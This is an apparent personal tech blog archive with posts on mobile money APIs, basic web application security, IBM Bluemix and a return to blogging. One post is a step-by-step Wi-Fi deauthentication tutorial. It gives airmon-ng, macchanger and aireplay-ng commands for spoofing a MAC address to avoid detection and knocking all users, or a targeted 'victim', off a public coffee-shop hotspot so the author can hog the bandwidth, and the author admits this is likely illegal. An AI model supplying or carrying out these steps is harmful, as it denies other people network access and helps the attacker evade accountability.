Tuesday, June 9, 2015

The Advent of Mobile money

It amazes me how mobile money has taken over the payment ecosystem in the developing countries. Statistics don't  lie, it states that most people have never had access to a bank account but almost everyone who owns a phone has access to mobile money. This speaks alot  about the kind of innovations that should be coming up from these countries. Card payments is still struggling to gain ground, but the notion that cards are not save still prevents people from using their cards for transactions. So what next?

Is card the solution to our problems? No. But mobile money is. 

Openness.

Most of the online transactions say 99.99% i.e ecommerce occurs via use of credit/debit card payments. The reason this is happening is because their has been developments of standards that support extensibility of this services. Today i can just wake up and decide am gonna start selling products or services globally and still be able to do the integration in less than a minute. But if i was to do the same locally i will have to go to a third party who is either an aggregator or just some bright guy who learned the tricks of processing mobile money.

So basically what  am trying to say is the providers of mobile money i.e Mpesa, Airtel Money ,Yu cash and  Orange money should develop open standard that will allow anyone to integrate and be able to conduct a seamless transaction. I don't know why it's taking them so long and yet they have the power to implement such Application programming interfaces (API). If they really have to compete and keep up with some upcoming ventures, they must learn how to move. I know most people will dismiss my argument, but still the mobile payments ecosystem is evolving. Soon, i mean very soon we shall see bright minds coming up with integration of mobile payments and cards. I will not talk much about it but watch this space.

According to PWC the mobile payments ecosystem will be worth $216 billion. Will you be part of this? And how? You can basically be part of the statistics by making payments, but that is not my concern. What is more important is will you be the one who facilitates the happenings behind the scenes. Will you create platforms to complement or compete with mobile money? I throw the ball on your court. The choice is in your hands either you swim or drown. Looks like you got not option anyway. You definitely will be part of the statistics.

Mobile money is already creating a storm. But seem the owners aren't keen on facilitating major innovations by developing open APIs for developers to integrate with mobile money. I know their are so many factors (like fraud detection, money laundering etc)  to consider when it comes to this kind of development. But people have done it elsewhere, why not borrow the concept. We have some of the brightest techies around who can take a walk-around on any of this challenges. So am appealing to the providers to hasten their moves and make this platform available ASAP!

Imagine mobile money vs IOT. Food for thought! :-)

Monday, July 14, 2014

Web Application Security: A must read for developers

There are people who spend their whole time trying to screw your web  application. Many ninjas have suffered from the hands of the black hats. Luckily i happen to be a white hat.
There are so many aspects to consider in making you web application secure. The Open Web Application Security Project (OWASP) have compiled a comprehensive list of known security issues and methods to protect yourself against them.
Some of the basic precautions you can take include:

Password Hashing 

Almost everyone build a web application that requires users to login with a username and a password. The credentials are stored in the database and retrieved when a user logs in.
It is important that you properly hash passwords before storing them. Password hashing is an irreversible, one way function performed against the user’s password. This means you can compare a hash against another to determine if they both came from the same source string, but you cannot determine the original string. If passwords are not hashed and your database is accessed by an unauthorized third-party, all user accounts are now compromised. Some users may (unfortunately) use the same password for other services. Therefore, it is important to take security seriously.

Sanitization

Sanitization is a way of ensuring that illegal or unsafe characters are removed from foreign input.
For example, you should sanitize foreign input before including the input in HTML or inserting it into a raw SQL query. When you use bound parameters with PDO, it will sanitize the input for you.

Data Filtering

Its is very bad for any app to accept foreign data without doing checks on it. So make sure you sanitize and validate foreign input before accepting it to you code.
While foreign data can be stored, combined, and accessed later, it is still foreign input. Every time you process, output, concatenate, or include data in your code, ask yourself if the data is filtered properly and can it be trusted. Data may be filtered differently based on its purpose. For example, when unfiltered foreign input is passed into HTML page output, it can execute HTML and JavaScript on your site! This is known as Cross-Site Scripting (XSS) and can be a very dangerous attack. One way to avoid XSS is to sanitize all user-generated data before outputting it to your page by removing HTML tags with the strip_tags function or escaping characters with special meaning into their respective HTML entities with the htmlentities or htmlspecialchars functions.

Validation

Validation ensures that foreign input is what you expect. For example, you may want to validate an email address, a phone number, or age when processing a registration submission.

Error Reporting

Error logging can be useful in finding the problem spots in your application, but it can also expose information about the structure of your application to the outside world. To effectively protect your application from issues that could be caused by the output of these messages, you need to configure your server differently in development versus production (live).

Configuration files

When creating configuration files for your applications, best practices recommend that one of the following methods be followed:
  • It is recommended that you store your configuration information where it cannot be accessed directly and pulled in via the file system.
  • Information in configuration files should be protected accordingly, either through encryption or group/user file system permissions

 

Friday, July 4, 2014

HACK: Bully everyone from using any wifi hotspot.

With this cold i cannot imagine someone giving me very hot coffee with slow Internet. I bet the consequences are unbearable.

Today in the morning i went to the coffee shop to get one cup before heading to office, there were several shops but the "free wifi" label attracted me. I decided to remove my computer to finish leeching some torrents. But the shock that fell on me was devastating and unberable. You could imagine how a married man who codes and has kids looks like if the kid pours coffee on the keyboard.
That's how i felt.
Anyway i decided to throw everyone else out of the network (its illegal i guess).

I will give you a step by step procedure on how you can do that. Script kiddies you might be very unlucky though.

This attack is referred as De-authentication attack. I am not liable or responsible for anything you may do with this information


Requirements:
1. Brewed coffee that can last the whole day. This is because you will enjoy the speeds when no one else is using the "free wifi".
2. You must be running on Linux platform.
3. Macchanger. ( sudo apt-get install macchanger)
4. Aircrack-ng. ( sudo apt-get install aircrack-ng)

5. Airplay-ng. ( sudo apt-get install aircrack-ng)
6. Wifi card that can be put into monitor mode.
Step X co
first we need to check if you wifi card is communicating properly with your machine.
Open a terminal and pass the following command

sudo airmon-ng
 this is the result

Next we will have to create our monitor interface, then fake our MAC address to avoid being caught.replace interface with the name of your interface, mine is wlan0

airmon-ng stop
ifconfig interface down
macchanger —mac 00:11:22:33:44:55 interface
airmon-ng start interface
Step X do
Now its time for action. using aireplay-ng we are going to pick the mac address of the hotspot we want to attack. Now run this command

aireplay-ng -0 1 -a bssid monitorinterface
To stop the process use ctrl-c, but you do this when you can no longer take more coffee.
Just incase you want to kick an hater out of the network you will use a different command.

aireplay-ng -0 1 -a bssid -c victimmac interface
I think we are done, now you can enjoy fast internet without bothering about others.
Wifi admins am so sorry but their is no other way you can prevent this. Just halla me for help. :-(

Thursday, July 3, 2014

ITS GOOD TO BE BACK.

Been really a long time since i started contemplating about writing this blog, Laziness crawled my way and been in a serious war to ensure everything is back to normal. Am not sure if its back. But anyway i want to share some few lessons i learnt while i was away.

This will also serve as a guide towards the next articles i will be publishing.
So #whileiwasaway:
  • I learn't java in a night. But with some few grams of coffee and watts .
  • I was scared when i was asked about linked list and arrays. You got to because its something you use daily but cant really define it.
  • Went for a rally and just tried to imagine the future of machine intelligence.
  •  I fell in love. It showed me logic doesn't apply everywhere.
Too much stories won't help us. But in the next few days i will try and focus in dissecting some of the lessons above and how we can use them to solve problems in the real world.

But today i just wanna leave you with some question.

Recently we have witnessed the growth of  mobile money, what do you think is its future, and does other electronic money i.e bitcoin pose a threat to it?

If you delete My Computer, will you computer disappear?


Wednesday, May 21, 2014

Codename:Bluemix My new Love.

It couldn't be this simple to deploy my application to the cloud in just some few seconds. Its not only exciting but tremendous.
Codename:Bluemix is an implementation of IBM’s Open Cloud Architecture, based on Cloud Foundry(cloud computing Platform as a service software) to enable developers to rapidly build, deploy, and manage their cloud applications, while enjoying the availability of several services, runtime and frameworks.
 IBM will provide services and runtimes into the ecosystem based on our extensive software portfolio.
The product is at beta stage and currently available for developers to test it free of charge asin 'free as beer'.
Being an enthusiast of the new product i have been trying to explore some of it main goals and it happens to be so brief and understandable. They say that bluemix will be able to:

  1. Reduce time for application/infrastructure provisioning.
  2. Allow for flexible capacity.
  3. Help to address any lack of internal tech resources.
  4. Reduce Total Cost of Ownership (TCO)
  5. Accelerate exploration of new workloads – social, mobile, big data.
This is the look and feel of the Dashboard.

For all developers out their interested in signing up for the beta, use this link https://ace.ng.bluemix.net/
I will take you step by step through the process of uploading your PHP application to bluemix.
Some of the other Capabilities bluemix has include Java, mobile backend development, application monitoring, as well as capabilities from ecosystem partners and open source — all through an as-a-service model in the cloud.